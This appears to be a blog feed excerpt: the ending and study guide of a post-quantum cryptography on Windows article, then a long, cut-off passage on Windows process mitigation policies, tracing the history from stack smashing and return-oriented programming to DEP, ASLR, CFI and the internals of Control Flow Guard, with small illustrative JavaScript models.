The work is not done. Kerberos PKINIT has no PQ path. Authenticode has no PQ specification. BitLocker network unlock is still RSA-2048. The EFI signature database is still RSA-2048. Every signed binary already on every Windows disk in the world is signed with an algorithm whose 2035 status is uncertain. The TPM 4096-byte buffer cannot fit an ML-DSA-87 signature. CNG ships per-algorithm identifiers, not per-algorithm-class, which guarantees that the next migration will hit the same surfaces from the same angle. CNSA 2.0 picks 2035; NIST IR 8547 picks 2035 [@cnsa20-csa, @nist-ir-8547]; the global public-CA infrastructure has nine years to rebuild every certificate it has ever issued.

"Migration to post quantum cryptography (PQC) is not a flip-the-switch moment, it's a multiyear transformation that requires immediate planning and coordinated execution to avoid a last-minute scramble." -- Microsoft Quantum-Safe Security blog, 20 August 2025 [@ms-quantum-safe-blog]

The cryptographic transition described here runs in parallel to the architectural transition documented across this blog's sibling articles. The hypervisor article explains the substrate on which the Secure Kernel and trustlets sit. The VBS trustlets article explains where Credential Guard lives. The NTLM-to-Kerberos article documents the protocol migration that PQ Kerberos PKINIT will eventually re-do. The Adminless article addresses the local-administrator surface; the Pluton and TPM articles cover the silicon-side roots of trust; the Secure Boot article covers the static measured boot chain that meets the dynamic measured boot chain at hypervisor load. Read them in any order. They share the same migration calendar, the same engineering discipline, and the same honesty about the gaps.

Above all, the bytes are real. The CNG handle exists. The SymCrypt release is shipping. The migration has started. The next decade is the engineering. Every line of code, every parameter set, every byte of that 1184-byte field has thirty years of work behind it, and the Windows engineer of 2026 is the one who carries it the next mile.

<StudyGuide slug="post-quantum-cryptography-on-windows" keyTerms={[ { term: "ML-KEM (FIPS 203)", definition: "Module-Lattice-Based Key-Encapsulation Mechanism. The only NIST-finalised post-quantum KEM. Parameter sets ML-KEM-512/768/1024 over R_q = Z_q[X]/(X^256 + 1) with q = 3329. ML-KEM-768 public key is 1184 bytes, ciphertext 1088 bytes, shared secret 32 bytes." }, { term: "ML-DSA (FIPS 204)", definition: "Module-Lattice-Based Digital Signature Algorithm. Fiat-Shamir-with-aborts over Module-LWE / Module-SIS, q = 8380417. Parameter sets ML-DSA-44/65/87; signatures 2420 / 3309 / 4627 bytes." }, { term: "SLH-DSA (FIPS 205)", definition: "Stateless Hash-Based Digital Signature Algorithm. SPHINCS+ lineage; security rests on hash-function security alone. Twelve parameter sets across SHA-2 and SHAKE; signatures 7,856 to 49,856 bytes." }, { term: "LWE / Ring-LWE / Module-LWE", definition: "Learning With Errors: distinguish (A, As + e) from uniform when e is small. Ring-LWE lifts to a polynomial ring; Module-LWE generalises to module-rank-k. The 2010-2012 algebraic lift compressed lattice key sizes from megabytes to kilobytes." }, { term: "NTT", definition: "Number Theoretic Transform. The finite-field analogue of the FFT; reduces polynomial multiplication in R_q from O(n^2) to O(n log n). The reason ML-KEM is fast enough for TLS." }, { term: "Fujisaki-Okamoto-Hofheinz transform", definition: "Generic IND-CPA-to-IND-CCA2 transform for KEMs. Re-encrypts the plaintext during decapsulation and returns implicit-rejection pseudorandom output on mismatch. ML-KEM wraps K-PKE with FO to become IND-CCA2." }, { term: "Mosca's inequality", definition: "X + Y > Z. If data-secrecy lifetime plus migration time exceeds time-to-quantum-computer, harvest-now-decrypt-later succeeds. The framing that made post-quantum migration an actionable IT-policy lever." }, { term: "CNSA 2.0", definition: "U.S. NSA Commercial National Security Algorithm Suite 2.0. 
Mandates ML-KEM-1024, ML-DSA-87, LMS/XMSS for firmware, AES-256, and SHA-384 in National Security Systems. Acquisition preference 2027; mandatory adoption 2031; RSA / ECDSA disallowed after 2035." }, { term: "Hybrid key agreement", definition: "Combines a classical key-agreement primitive (X25519) with a post-quantum KEM (ML-KEM-768) so the session key depends on both. An adversary must break both components to forge or recover. Used by Cloudflare since October 2022, Apple iMessage PQ3 since February 2024, Schannel preview in 2026." }, { term: "Composite signature", definition: "X.509 signature that combines a classical and a post-quantum component such that both must verify. The deployment story for 2026-2030 X.509 PKI migration, per draft-ietf-lamps-pq-composite-sigs-19. Downlevel verifiers ignore the composite OID; uplevel verifiers validate both." }, { term: "Algorithm agility", definition: "The property that protocols and APIs can change the underlying algorithm without re-engineering the consumer. CNG ships per-algorithm identifiers (BCRYPT_MLKEM_ALGORITHM) rather than per-algorithm-class identifiers; a future Round-5 KEM will require new CNG plumbing." }, { term: "X25519MLKEM768", definition: "Hybrid TLS 1.3 Supported Group, codepoint 0x11EC, defined in draft-ietf-tls-ecdhe-mlkem-04. Concatenates X25519 (32-byte) and ML-KEM-768 (1184-byte ek / 1088-byte ct) shares. ClientHello key_share is 1216 bytes; ServerHello key_share is 1120 bytes." } ]} questions={[ { q: "Why is the post-quantum programme a public-key replacement programme and not a symmetric one?", a: "Shor's algorithm breaks RSA / DH / ECDSA / ECDH in polynomial time on a fault-tolerant quantum computer, with no parameter increase rescuing them. Grover's algorithm gives only a quadratic speedup on symmetric primitives, which is absorbed by doubling key sizes (AES-256, SHA-384). The asymmetric lane is fatal; the symmetric lane is a parameter bump." 
}, { q: "What single algebraic move compressed lattice public keys from megabytes to kilobytes?", a: "Lifting Learning With Errors from Z_q to a polynomial ring R_q = Z_q[X]/(X^n + 1), per Lyubashevsky-Peikert-Regev 2010. Polynomial multiplication via NTT becomes O(n log n) instead of O(n^2). Module-LWE (Langlois-Stehle 2012/2015) added a module-rank parameter knob that lets one base ring serve every NIST security category." }, { q: "Why does the NIST FIPS slate combine a lattice scheme and a hash scheme rather than two lattice schemes?", a: "Diversification. Both the Rainbow break (Beullens, February 2022) and the SIKE break (Castryck-Decru, July 2022) happened during the NIST competition. The portfolio rests on two structurally unrelated foundations (lattice + hash) so that a single mathematical break cannot retire the whole programme. SLH-DSA's security rests on hash-function security alone." }, { q: "Which SymCrypt version first added ML-KEM?", a: "Version 103.5.0, which 'Add ML-KEM per final FIPS 203' along with XMSS and XMSS^MT. Subsequent versions added LMS (103.6.0), ML-DSA (103.7.0), the FIPS approved-services indicator (103.8.0), ML-DSA External-Mu (103.9.0), FIPS CAST for ML-DSA (103.9.1), and Composite ML-KEM (103.11.0)." }, { q: "What TLS Supported Group does Schannel preview-negotiate on 24H2, and what is its codepoint?", a: "X25519MLKEM768, codepoint 0x11EC, per draft-ietf-tls-ecdhe-mlkem-04 (8 February 2026). The ClientHello carries 32 bytes X25519 + 1184 bytes ML-KEM-768 encapsulation key (1216 bytes total); the ServerHello carries 32 bytes X25519 + 1088 bytes ML-KEM-768 ciphertext (1120 bytes total)." }, { q: "Why does ML-DSA-87 not fit on a commodity TPM 2.0 chip?", a: "ML-DSA-87 signatures are 4627 bytes. Default TPM 2.0 MAX_COMMAND_SIZE and MAX_RESPONSE_SIZE are 4096 bytes. 
TCG TPM 2.0 Library Specification v1.85 (March 2026) introduces a streaming TPM2_SignSequence Start / Complete family (with TPM2_SignDigest / TPM2_VerifyDigestSignature for digest-mode operations) and ML-KEM TPM2_Encapsulate / Decapsulate, but v1.85-capable chips are in early sampling in 2026, not retail volume." }, { q: "What is the difference between LMS / XMSS and SLH-DSA, and when does CNSA 2.0 prefer each?", a: "LMS and XMSS are stateful: the signer must track a counter and never reuse a leaf index. SLH-DSA derives the leaf address from the message hash and per-signature randomness, making it stateless. CNSA 2.0 specifies LMS or XMSS for firmware signing (where build pipelines already track counters under HSM custody) and ML-DSA-87 for general signing." }, { q: "Why does PQC not close the signed-binary persistence channel?", a: "Authenticode signatures are validated at binary load time. A 2026 RSA-2048 signature has already been verified by every machine that downloaded the binary; a 2035 quantum break does not retroactively decrypt anything because Authenticode is not an encryption channel. The threat model is forgery of new signatures on new binaries, not retroactive decryption. Harvest-now-decrypt-later does not apply." } ]} />

Process Mitigation Policies: CFG, ACG, CIG, and the Layer Between App Identity and the Kernel

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Windows ships every modern memory-corruption mitigation as a per-process flag rather than a system-wide setting -- because Outlook can't enable CIG, Defender can't enable ACG, and Notepad doesn't need Disable-Win32k. `SetProcessMitigationPolicy` exposes twenty of these knobs (plus a `MaxProcessMitigationPolicy` sentinel that terminates the enum); the canonical six (DEP, ASLR, CFG, CET shadow stack, ACG, CIG) constrain the control-flow primitives, and the other fourteen cover adjacent attack surfaces. Each knob is a tombstone for an exploit primitive that worked in the previous generation. This article walks the thirty-year arc that built that surface, then names the residual attacks that survive even a fully-stacked process.

1. The bug is still there. Why didn't the exploit work?

A vulnerability researcher has just landed a type-confusion bug in a JavaScript engine inside an Edge content process. The primitive is exactly what they expected: a writable heap address holding a corrupted vtable pointer. From that pointer the renderer will, on its very next virtual-method call, jump into an address the attacker chose.

That is supposed to be game over. It is, in the language of every exploit-development textbook from 1996 onward, a working write-what-where. The CPU loads the corrupted pointer into a register. It dereferences it. It calls.

And the process dies.

There is no shell. There is no remote code execution. There is a Windows Error Reporting dialog and a STATUS_STACK_BUFFER_OVERRUN (with fast-fail code FAST_FAIL_GUARD_ICALL_CHECK_FAILURE) in the crash log, raised from a thunk named ntdll!LdrpValidateUserCallTarget that the researcher has never seen in their disassembler before. The bug fired exactly as the recipe said. The exploit chain didn't.

What stopped it?

Note: Every per-process mitigation in SetProcessMitigationPolicy is a tombstone for an exploit primitive that worked in the previous generation. The list of policies is, read top to bottom, an attacker's autobiography [@ms-setprocessmitigationpolicy].

A per-process, opt-in security policy installed via the Win32 `SetProcessMitigationPolicy` API (or, more safely, via `UpdateProcThreadAttribute` before a child process executes its first user-mode instruction). The `PROCESS_MITIGATION_POLICY` enum lists twenty-one values -- twenty actual policies plus the `MaxProcessMitigationPolicy` sentinel that terminates the enum -- as of Windows 11 24H2, each one a separate axis on which an exploit can fail [@ms-process-mitigation-enum, @ms-setprocessmitigationpolicy].

The fastest way to see this is to compare two PowerShell sessions. Pick a maximally-hardened process, the Edge content process, and run Get-ProcessMitigation -Name msedge.exe. Six mitigations show as ON: CFG, CET shadow stack, ACG, CIG, Disable-Win32k, and Disable-Extension-Points. Now do the same for Notepad.exe. One or two show as ON. Notepad is a different kind of process -- it is not parsing attacker-controlled bytes from the public internet, so the mitigation surface it carries is correspondingly small.

The mitigation set is not just an enable-everything list. Several of the policies are mutually expensive (CET costs cycles on every call/ret; ACG forbids any in-process JIT; CIG forbids any third-party plugin); turning them all on is only viable for a process whose owner accepts those costs. The PowerShell Set-ProcessMitigation and Get-ProcessMitigation cmdlets ship in the ProcessMitigations module that succeeded EMET in 2018.

Edge carries six mitigations because it has six structurally separate ways the attacker can win. CFG addresses the indirect-call hijack. CET addresses the return-address hijack. ACG addresses the "redirect the JIT to emit my shellcode" hijack. CIG addresses the "plant a non-Microsoft-signed DLL where the loader picks it up" hijack. Disable-Win32k addresses the renderer-to-kernel escape. Disable-Extension-Points addresses the AppInit_DLLs-class injection.

Each one is the closing footnote on a different generation of offensive research. CFG closes indirect-call hijacking. CET closes return-address overwriting. ACG closes JIT spray. CIG closes the planting of DLLs that Microsoft did not sign. Get-ProcessMitigation lays them out as a flat list of ON checkmarks, as if they had always been there -- as if they had not each cost a decade of research to design and ship.

So the chain failed. But which mitigation caught the indirect-call hijack we started with -- and why was that one on? Where do these mitigations come from, and how did Windows arrive at this exact set? To answer that, we have to go back three decades.

2. How attackers stopped being able to put bytes on the stack and run them

The story starts in November 1996. Phrack magazine, issue forty-nine, file fourteen of sixteen. Aleph One -- the handle of Elias Levy, a security columnist who would later moderate the BugTraq mailing list -- publishes Smashing The Stack For Fun And Profit [@phrack-49-14]. The article is a recipe. It walks the reader through process memory layout on Unix, the structure of the call stack on x86, the mechanics of overwriting the saved return address, the construction of /bin/sh shellcode, and the use of NOP sleds. By the end the reader has working exploit code against syslog, splitvt, sendmail 8.7.5, and Linux/FreeBSD mount.

Buffer overflows existed before Aleph One. The 1988 Morris Worm used one in fingerd; Mudge's 1995 L0pht paper How to Write Buffer Overflows had pieces of the technique. But it was an oral tradition -- something you learned at DEFCON or from someone who learned it at DEFCON. Aleph One's contribution was pedagogical: a step-by-step recipe anyone with a debugger and an afternoon could follow. Once that recipe was published, every memory-safety bug in C and C++ -- and there were many -- became a candidate for shell-as-the-vendor.

The defensive response came fast, and it came with a brutal honesty that has shaped every later mitigation. In August 1997, Alexander Peslyak, writing under the handle Solar Designer and running the Openwall Project, posted to BugTraq [@solar-designer-bugtraq-1997]. He had two things. The first was a Linux kernel patch -- still documented at the Openwall README to this day -- that made user-mode stack pages non-executable in software, since AMD's hardware NX bit was six years away [@openwall-readme]. The second was a working return-into-libc exploit against lpr, which redirected execution into system() in the C library rather than into stack-resident shellcode.

Solar Designer was honest enough to publish the bypass on the same day as the patch. This is a defender-publishes-own-bypass precedent that has governed almost every Microsoft mitigation announcement since: ship the mitigation, name the residual attack class, set the expectation that the mitigation is a speed bump rather than a fix.

A memory protection invariant -- "write XOR execute" -- requiring that any page in the process address space be either writable or executable, but never both at the same time. PaX shipped the first complete implementation of W^X on Linux in 2000; AMD's NX bit in 2003 moved it from software emulation to hardware enforcement; the per-process ACG policy in Windows generalises W^X to apply for the lifetime of an entire process, with no per-thread escape hatch.

The next move was structural. In September 2000 the pseudonymous PaX Team released PAGEEXEC, the Linux non-executable-page implementation that made every writable page non-executable (not just the stack), using clever x86 segment-limit and split-TLB tricks [@wiki-pax]. PaX is also where the term "ASLR" comes from. The July 2001 PaX patch series randomized the executable base, the stack, the heap, the mmap'd library region, and (with RANDEXEC) even the position of the executable's code segment. The PaX design document for ASLR is unusually rigorous about probability -- it derives the expected number of brute-force attempts as a function of entropy bits, years before anyone framed it that way in the academic literature.

Address Space Layout Randomization. Per-boot or per-load randomization of the locations at which the kernel maps modules, the stack, the heap, and `mmap`'d regions into a process's virtual address space. On x86-32 Windows Vista, modules had one of 256 possible base addresses (about 8 bits of entropy). On x64 with `/HIGHENTROPYVA`, entropy is much higher because the virtual address space is larger. ASLR is the precondition that makes every later forward-edge CFI scheme worth deploying -- without it, the attacker just hardcodes the call target.
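The relationship between entropy bits and brute-force cost can be made concrete with a few lines of arithmetic. The sketch below is not the PaX derivation itself; it assumes uniformly random placement and one guess per attempt, and the two function names are illustrative.

```javascript
// Expected brute-force cost against ASLR with `bits` bits of entropy.
// Assumption: uniformly random placement, one guess per attempt.

// Case 1: the layout stays fixed between attempts, so the attacker can
// cross off wrong guesses. Expected attempts = (N + 1) / 2.
function expectedAttemptsFixedLayout(bits) {
  const n = 2 ** bits;
  return (n + 1) / 2;
}

// Case 2: the layout is re-randomized after every failed attempt, so each
// guess succeeds independently with probability 1/N. Expected attempts = N.
function expectedAttemptsRerandomized(bits) {
  return 2 ** bits;
}

for (const bits of [8, 16, 24]) {
  console.log(
    bits + ' bits: fixed layout = ' + expectedAttemptsFixedLayout(bits) +
    ', re-randomized = ' + expectedAttemptsRerandomized(bits)
  );
}
```

With the 8 bits quoted for x86-32 Vista, both cases land in the low hundreds of attempts, which is why a larger address space matters so much.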

Hardware finally caught up on September 23, 2003. AMD shipped the no-execute bit -- "NX bit," bit 63 of the 64-bit long-mode page-table entry -- with the Athlon 64 launch [@wiki-nx-bit]. Intel followed with the marketing-renamed "XD bit" in later Pentium 4 Prescott silicon. From 2003 onward, marking a page non-executable was a single PTE flag away.

Microsoft consumed the hardware almost immediately. Windows XP Service Pack 2, RTM August 6, 2004, shipped Data Execution Prevention as a system-wide feature. DEP defaulted to OptIn but supported four system-level modes (OptIn, OptOut, AlwaysOn, AlwaysOff) and exposed a per-binary opt-in via the /NXCOMPAT PE-header flag. On hardware without NX, DEP fell back to a software emulation limited to system-supplied binaries.

The Wikipedia ROP article frames this moment exactly: "Microsoft Windows provided no buffer-overrun protections until 2004" [@wiki-rop]. After XP SP2, Windows joined PaX, OpenBSD, and Solar Designer's Openwall on the W^X side of the line.

Three years later, in January 2007, Microsoft shipped Vista. Vista randomized DLL and EXE module bases at boot, with 256 possible load locations per module on x86. Michael Howard's MSDN design blog from May 2006 gives a worked example showing wsock32.dll at 0x73ad0000 on one boot and 0x73200000 on the next [@ms-howard-vista-aslr]. Vista paired ASLR with /GS stack canaries, /SafeSEH validated SEH chains, DEP, and pointer obfuscation -- the first Microsoft OS to ship a layered exploit-mitigation stack as policy.

flowchart LR
A["1996 Nov<br/>Aleph One<br/>Phrack 49 14"] --> B["1997 Aug<br/>Solar Designer<br/>non-exec stack<br/>+ return-into-libc"]
B --> C["2000 Sep<br/>PaX Team<br/>PAGEEXEC"]
C --> D["2001 Jul<br/>PaX<br/>first ASLR"]
D --> E["2003 Sep<br/>AMD NX bit<br/>Athlon 64"]
E --> F["2004 Aug<br/>Microsoft DEP<br/>Windows XP SP2"]
F --> G["2006 May<br/>Microsoft<br/>Vista ASLR design"]
G --> H["2007 Jan<br/>Vista GA<br/>layered mitigation"]

DEP and ASLR are not per-process mitigations in the modern sense. They are the system-wide foundation that the per-process surface sits on top of. The reason ProcessDEPPolicy still exists in the modern enum at all is to give 32-bit processes a way to enforce DEP locally even when the system policy is permissive. On x64, DEP is unconditionally on; the per-process knob is a vestigial 32-bit-only flag. ProcessASLRPolicy is more useful -- it allows a process to force-on high-entropy bottom-up randomization with ForceRelocateImages -- but it too is a refinement of a system-wide foundation, not a new defensive primitive [@ms-setprocessmitigationpolicy].

By 2007, the story should have been over. DEP had made shellcode unrunnable. ASLR had made gadget addresses unpredictable. Every attacker primitive Aleph One named in 1996 was, in principle, defended. It was not.

Because the attacker did not need to write new bytes. They could reuse the bytes that were already there.

3. ASLR plus DEP made shellcode hard, so attackers stopped writing shellcode

October 2007. Hovav Shacham, then on the UC San Diego computer-science faculty after a postdoctoral fellowship at the Weizmann Institute, presents The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) at ACM CCS [@shacham-rop-pdf]. The paper's existence claim is simple and devastating: in any sufficiently large C library, the set of short instruction sequences ending in ret is Turing-complete. The attacker does not need to inject any new code. They only need to write data -- a sequence of return addresses on the stack -- and the CPU obediently executes already-mapped, already-executable libc bytes in the attacker's chosen order.

The mechanism is small enough to explain in a paragraph. Shacham named the technique return-oriented programming. The attacker arranges for the program to return into a gadget -- a short sequence of one to four instructions ending in ret. The gadget is selected from existing executable memory: libc, ntdll, the program's own code segment. The instructions perform a useful primitive (load a register, do arithmetic, dereference a pointer). The trailing ret pops the next stack slot, which the attacker has populated with the address of the next gadget. The stack is now the program counter; the CPU is now a Turing-complete machine for whatever language the gadget catalog implements.
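The "stack is now the program counter" idea can be sketched as a toy interpreter. This is a model only, not real exploit code: the "addresses" are string keys, the gadgets are plain JavaScript functions, and every name in it is hypothetical.

```javascript
// Toy model: each gadget performs one small operation and then "returns",
// which here means the loop pops the next stack slot and dispatches to it.
const gadgets = {
  pop_rax: (m) => { m.rax = m.stack.pop(); },   // models: pop rax ; ret
  pop_rbx: (m) => { m.rbx = m.stack.pop(); },   // models: pop rbx ; ret
  add_rax_rbx: (m) => { m.rax += m.rbx; },      // models: add rax, rbx ; ret
};

function runChain(chain) {
  // Reverse the chain so that pop() yields slots in the order the
  // attacker laid them out.
  const m = { rax: 0, rbx: 0, stack: [...chain].reverse() };
  while (m.stack.length > 0) {
    const target = m.stack.pop();               // the trailing `ret`
    const gadget = gadgets[target];
    if (!gadget) throw new Error('return to unmapped address: ' + target);
    gadget(m);
  }
  return m;
}

// Attacker-controlled data only: gadget addresses interleaved with operands.
const result = runChain(['pop_rax', 40, 'pop_rbx', 2, 'add_rax_rbx']);
console.log('rax =', result.rax); // rax = 42
```

No new code enters the gadget table at any point; the computation is expressed entirely by the data placed on the stack.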

An exploitation technique in which the attacker chains short, existing instruction sequences ("gadgets") each ending in `ret`. Control transfers happen via the program's own return instructions, executing already-mapped, already-executable code. ROP defeats W^X (DEP, NX) because the attacker injects no new code; ASLR raises its cost but does not stop it, because info-leak primitives recover the gadget base address. Coined by Hovav Shacham in 2007 [@shacham-rop-pdf].

The follow-up Black Hat USA 2008 talk generalised the result to RISC architectures [@shacham-bhusa-2008], killing "x86's variable-length instructions are why ROP works" as a defensive direction. ROP works on ARM. ROP works on MIPS. ROP works wherever an attacker can predict the address of executable bytes and control the stack.

Return-oriented programming allows an attacker to execute code in the presence of security defenses such as executable space protection. -- Wikipedia, *Return-oriented programming*, lead paragraph [@wiki-rop]

After 2007, the structural agenda of every defensive engineering team on Windows changes. The question is no longer "can we stop the attacker from writing bytes into executable pages?" -- DEP solved that, and ROP routed around it. The question is now: "which control transfers is the attacker allowed to cause?"

Shacham's UCSD lab (later UT Austin) kept exploring the boundary between code-reuse attacks and provable software defenses. The 2007 paper is the field-shaping one; the 2008 BHUSA generalisation to RISC was the closing argument.

Key idea: After Shacham 2007, every defensive engineering decision in Windows mitigation has been about which control-flow transfers the attacker is allowed to cause, not about what bytes the attacker can write. This is the article's load-bearing axis. CFG, XFG, CET, ACG, CIG, and every smaller mitigation in PROCESS_MITIGATION_POLICY follow from this one shift.

Microsoft's first response was behavioral, not structural. In 2009 the company released the Enhanced Mitigation Experience Toolkit (EMET), a free shim DLL that injected runtime checks into existing user-mode processes to detect ROP-shaped behavior. EMET checked for stack pivots, for unaligned ret-targets, for known-malicious gadget sequences, for unusual SEH chain layouts. It worked, intermittently, for a while. Then attackers adjusted, gadget-replacing around EMET's heuristics, and Microsoft slowly conceded the behavioral-detection direction was a dead end. EMET's final release was 5.52 in November 2016; end of life was July 31, 2018 [@wiki-emet]. Microsoft's stated successors are the ProcessMitigations PowerShell module and Windows Defender Exploit Guard -- i.e., the formal SetProcessMitigationPolicy surface this article catalogs [@wiki-emet].

EMET was an honorable failure. It taught the security industry that you cannot detect a control-flow hijack by looking at its symptoms; you can only prevent it by enforcing an invariant on the control flow itself. That lesson is exactly what Control Flow Guard (CFG) and Control-Flow Enforcement Technology (CET) embody. Every behavioral-ROP-detection product since EMET (Carbon Black's BB exploit protection, Symantec's Heat Shield, vendor-specific EDR ROP checks) has had the same fate against motivated adversaries -- you can buy time but you cannot fix the problem in heuristics.

The structural answer arrived two years before the offensive proof that motivated it. In November 2005, at ACM CCS, Martín Abadi, Mihai Budiu, Úlfar Erlingsson, and Jay Ligatti published Control-Flow Integrity (also released as Microsoft Research Technical Report MSR-TR-2005-18) [@msr-cfi]. Their formal definition is short: the execution of a program dynamically follows only paths defined by a static control-flow graph. They proved CFI is enforceable using compile-time-inserted runtime checks and demonstrated a software rewriting implementation.

A defensive property formalized by Abadi, Budiu, Erlingsson, and Ligatti in 2005 [@msr-cfi]: the execution of a program must dynamically follow only paths defined by the static control-flow graph (CFG) of the program. CFI partitions into a forward-edge property (the targets of indirect calls and jumps must be valid) and a backward-edge property (the targets of returns must be the call-sites that called them). CFG, XFG, kCFG, and Apple's PAC are forward-edge CFI implementations. CET's shadow stack is a backward-edge CFI implementation.

CFI was a research framework looking for a vendor. It would wait nine years. The reader's belief at this point might be "DEP plus ASLR is enough." The honest belief, after Shacham, is that DEP plus ASLR raises the cost but does not change the game. The attacker still wins if they can choose where the next ret lands. The structural answer -- constraining the control transfer rather than the write -- is what makes Control Flow Guard make sense.

What does constraining the control transfer look like in machine code?

4. Control Flow Guard (CFG): compile-time, load-time, runtime

Where DEP was enforced by hardware on every page, CFG is enforced by software on every indirect call. The compiler is now a security tool.

CFG's ship history is more complicated than the marketing remembers. The canonical primary on the early dates is Yunhai Zhang's Black Hat USA 2015 deck, Bypass Control Flow Guard Comprehensively, which states verbatim: "It was first introduced in Windows 8.1 Preview, but disabled in Windows 8.1 RTM for compatibility reason. Then, it was improved and enabled in Windows 10 Technical Preview and Windows 8.1 Update" [@zhang-bhusa15]. Visual Studio 2015 added the compiler and linker flags. By the time Windows 10 shipped to consumers in July 2015, CFG was a documented Win32 security feature [@ms-cfg-doc].

Stage 1 had this ship date as "Windows 8.1 Update 3 November 2014 vs Windows 10 July 2015". Zhang's deck is the contemporaneous primary that resolves the dispute. CFG was in Windows 8.1 Preview, was removed from Windows 8.1 RTM for compatibility, returned in Windows 8.1 Update and Windows 10 Technical Preview, and shipped widely with Windows 10 in 2015.

The mechanism has four phases. Each phase is a separate engineering subsystem, owned by a different team.

Phase 1: Compile-time (/guard:cf). The MSVC compiler emits, before every indirect call instruction, a call to one of two compiler-supplied thunks: __guard_check_icall_fptr for the standard pattern, or __guard_dispatch_icall_fptr for the tail-call optimization where the validator itself jumps to the target [@ms-guard-cf-compiler]. The thunk is a single indirection through ntdll. At compile time it is a stub; at load time it is patched to point at the active validator.

Phase 2: Link-time (/GUARD:CF, which requires /DYNAMICBASE). The linker writes the Guard CF Function Table (FID table) into the PE image's IMAGE_LOAD_CONFIG_DIRECTORY [@ms-guard-cf-linker]. This table is the static catalog of every CFG-valid call target in this binary: every function whose address is taken, plus every function exported. dumpbin /headers /loadconfig <binary> prints the table contents -- you can read the actual Guard CF flag word and the FID table present line.

Note: The MSVC linker only emits the FID table when /DYNAMICBASE is also set [@ms-guard-cf-compiler, @ms-guard-cf-linker]. A binary compiled with /guard:cf but linked without /DYNAMICBASE will pass code review, ship, and provide zero protection at runtime. This is the single most common CFG misconfiguration in third-party software. Always confirm with dumpbin /headers /loadconfig that the Guard Flags word is non-zero and that FID Table present is in the output.
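The misconfiguration described in the note can be expressed as a small check over two header values. This is a minimal sketch: it assumes the `DllCharacteristics` word and the load-config Guard Flags word have already been extracted (for example by reading them off `dumpbin` output), and `cfgProblems` is a hypothetical helper name. The constant values are the ones defined in `winnt.h`.

```javascript
// Bit values from winnt.h.
const IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040;
const IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000;
const IMAGE_GUARD_CF_INSTRUMENTED = 0x00000100;
const IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT = 0x00000400;

// Returns a list of reasons why CFG would not be effective for this image.
// An empty list means the header values look consistent with working CFG.
function cfgProblems(dllCharacteristics, guardFlags) {
  const problems = [];
  if (!(dllCharacteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)) {
    problems.push('image was not linked with /DYNAMICBASE');
  }
  if (!(dllCharacteristics & IMAGE_DLLCHARACTERISTICS_GUARD_CF)) {
    problems.push('GUARD_CF DLL characteristic is not set');
  }
  if (!(guardFlags & IMAGE_GUARD_CF_INSTRUMENTED)) {
    problems.push('no CFG instrumentation recorded in Guard Flags');
  }
  if (!(guardFlags & IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT)) {
    problems.push('FID table is not present');
  }
  return problems;
}

// Illustrative header values, not taken from a specific binary.
console.log(cfgProblems(0x4160, 0x00010500)); // well-formed: no problems
console.log(cfgProblems(0x0120, 0x00000000)); // CFG missing at every layer
```

A check like this fits naturally into a build pipeline step that fails when the returned list is non-empty.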

Phase 3: Load-time. At process startup and on every subsequent LoadLibrary, ntdll!LdrpProtectAndRelocateImage unions the FID table of the loaded image into a per-process bitmap. The bitmap is a sparse data structure with one bit per 8 bytes of virtual address space. On 32-bit Windows, a 2 GB user address space works out to about 32 megabytes of valid-target bits. On x64, the same ratio applied to a 128 TB user address space gives a bitmap on the order of 2 terabytes of reserved virtual address space -- but the memory only commits on access, so the resident set stays small.
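The bitmap size follows directly from the one-bit-per-8-bytes ratio. The sketch below works the arithmetic with BigInt; the two address-space sizes (2 GiB of user space on 32-bit, 128 TiB on x64) are assumptions chosen for illustration.

```javascript
// One bitmap bit covers 8 bytes of address space; 8 bits fit in one byte.
const BYTES_COVERED_PER_BIT = 8n;
const BITS_PER_BYTE = 8n;

// Size of the full bitmap, in bytes, for a given address-space size.
function bitmapBytes(addressSpaceBytes) {
  return addressSpaceBytes / BYTES_COVERED_PER_BIT / BITS_PER_BYTE;
}

const MiB = 1n << 20n;
const TiB = 1n << 40n;

const user32 = 1n << 31n; // assumed: 2 GiB user-mode address space
const user64 = 1n << 47n; // assumed: 128 TiB user-mode address space

console.log('32-bit: ' + bitmapBytes(user32) / MiB + ' MiB of bitmap');
console.log('x64: ' + bitmapBytes(user64) / TiB + ' TiB of bitmap (reserved, not committed)');
```

Under those assumptions the x64 figure is a virtual reservation only, which is why commit-on-access is what keeps the resident set small.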

A sparse, per-process bit vector indexed by virtual address (one bit per 8 bytes). A set bit at index `addr / 8` means that `addr` is a CFG-valid indirect-call target in some loaded image. The kernel commits the bitmap pages on first access and shares them copy-on-write across processes with identical module-load layouts. The bitmap is the runtime data structure that `LdrpValidateUserCallTarget` consults on every indirect call.

Phase 4: Runtime. Every indirect call goes through ntdll!LdrpValidateUserCallTarget. The validator takes the call target in rcx (x64 calling convention), divides by 8, indexes into the bitmap, and tests the bit. If set, return; the call proceeds. If clear, fall through to __fastfail(FAST_FAIL_GUARD_ICALL_CHECK_FAILURE), which raises STATUS_STACK_BUFFER_OVERRUN. The process dies.
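The divide-by-8, index, test-the-bit sequence can be modeled in a few lines. This is a deliberately simplified sketch of the one-bit-per-8-bytes model described above, not the shipping validator, which is more involved; `CfgBitmapModel` and the addresses are hypothetical.

```javascript
// Simplified model of the CFG bitmap: one bit per 8 bytes of address space.
// A Set of bit indexes stands in for the sparse bitmap.
class CfgBitmapModel {
  constructor() {
    this.setBits = new Set();
  }

  // Load-time: record an address from an image's FID table as a valid target.
  markValid(address) {
    this.setBits.add(address >> 3n); // address / 8
  }

  // Runtime: called before every indirect call in this model.
  validate(target) {
    if (!this.setBits.has(target >> 3n)) {
      // Stands in for __fastfail(FAST_FAIL_GUARD_ICALL_CHECK_FAILURE).
      throw new Error('fast-fail: invalid call target 0x' + target.toString(16));
    }
  }
}

const bitmap = new CfgBitmapModel();
bitmap.markValid(0x7ff612341000n);       // a legitimate function entry

bitmap.validate(0x7ff612341000n);        // bit set: the call proceeds
try {
  bitmap.validate(0x7ff612341a37n);      // mid-function gadget: bit clear
} catch (e) {
  console.log(e.message);
}
```

The model also shows the coarseness: any address that was ever marked valid passes for every call site, regardless of the prototype the caller expected.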

sequenceDiagram
participant Src as C++ source
participant CC as "MSVC /guard:cf"
